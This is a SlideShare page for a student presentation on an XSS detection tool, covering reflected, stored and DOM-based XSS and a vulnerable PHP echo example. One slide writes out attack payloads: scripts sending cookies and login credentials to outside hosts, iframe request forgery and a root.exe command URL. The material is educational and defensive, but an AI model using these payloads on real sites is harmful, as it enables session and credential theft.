XSS-Alert-Pentration testing tool

7,392 views
7,316 views

Published on

This presentation describe how XSS alert tool works

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
7,392
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
66
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

XSS-Alert-Pentration testing tool

  1. 1. Cross Side Scripting (XSS) attack detection for web application http://sourceforge.net/projects/xssalert7/ Author: Arjun Jain (07104701) Department of Computer Science and Information Technology Jaypee Institute of Information Technology Sector-62 Noida ,Uttar Pradesh
  2. 2. Agenda Overview of XSS attack Type of XSS attack Example Limitation of attack DOM security overview XSS alert working model Demo
  3. 3. What is Cross Side Scripting (XSS)Cross-site scripting (XSS) is a type of computer security vulnerability typically foundin web applications that enables malicious attackers to inject client side script intoweb pages viewed by other.Types:1: Reflected XSS2: Stored XSS3: DOM based XSS
  4. 4.  Ranked #1 in OWASP 2007 top 10 Ranked #2 in OWASP 2010 top 10 7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security statistics report, Oct 2007 )
  5. 5. Reflected XSSIt detect all non-persistent XSS issues which occur when a web application blindlyecho parts of the HTTP request in the corresponding HTTP response HTML.Example :<?php $name= request.getParameter(“name”); echo “Hey”.$name;?>$name may contain javascript.
  6. 6. Stored XSSIt refers to all XSS vulnerabilities, where the adversary is able to permanently injectthe malicious script in the vulnerable application storage . The result is every userthat accesses the poisoned web page received the injected script without furtheraction by the adversary.
  7. 7. DOM-based XSSIt is special variant of the reflected XSS, where logic errors in legitimate JavaScriptand careless usage of the client-side data result in XSS coordination.
  8. 8. Example
  9. 9. Invalidated input with XSS
  10. 10. Invalidated input with XSS
  11. 11. Invalidated input in XSS
  12. 12. Invalidated input in XSSInvalidated Input and resulted in a Cross-Site Scripting attackand the theft of the administrator’s Cookies.
  13. 13. Types of Information leakageClient can reveal cookies to 3rd party (session state, order info, etc)http://host/a.php?variable="><script>document.location=http://www.cgisecurity.com/cgi-bin/cookie.cgi?%20+document.cookie</script >Client can reveal posted form items to 3rd party (userID/passwd, etc)<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;hackImg.src=http://www.malicioussite.com/+document.forms(1).login.value+:+document.forms(1).password.value;" </form>Client can be tricked into accessing/posting spoofed info to trusted serverwww.trustedserver.com/xss.asp?name =<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>Client can be tricked into attacking other sites/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>
  14. 14. Limitation of these attacks Usually only get one transaction with XSS code against vulnerable site Most attacks are only focused on collecting cookies POST based forms are seldom leveraged – almost always use GET methods Attacker does not know actual responses to client Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.
  15. 15. DOM Security Overview Child windows and same site trust Scripts can interact between the two windows Script content can be loaded from anywhere (RPC/Remote scripting is common) Images can be loaded from anywhere Javascript can either be within <script></script> tags, loaded elsewhere via <script src=remote.com>, or attacked to many tags <img src=javascriptn load=javascript> Form GET/POST can be to another site or a javascript action XSS allows DOM abuse, but still follows DOM rules
  16. 16. XSS alert working model
  17. 17. Demo
  18. 18. Attack on Yahoo server with get string “?q=”
  19. 19. Final Result
  20. 20. Thank You !

×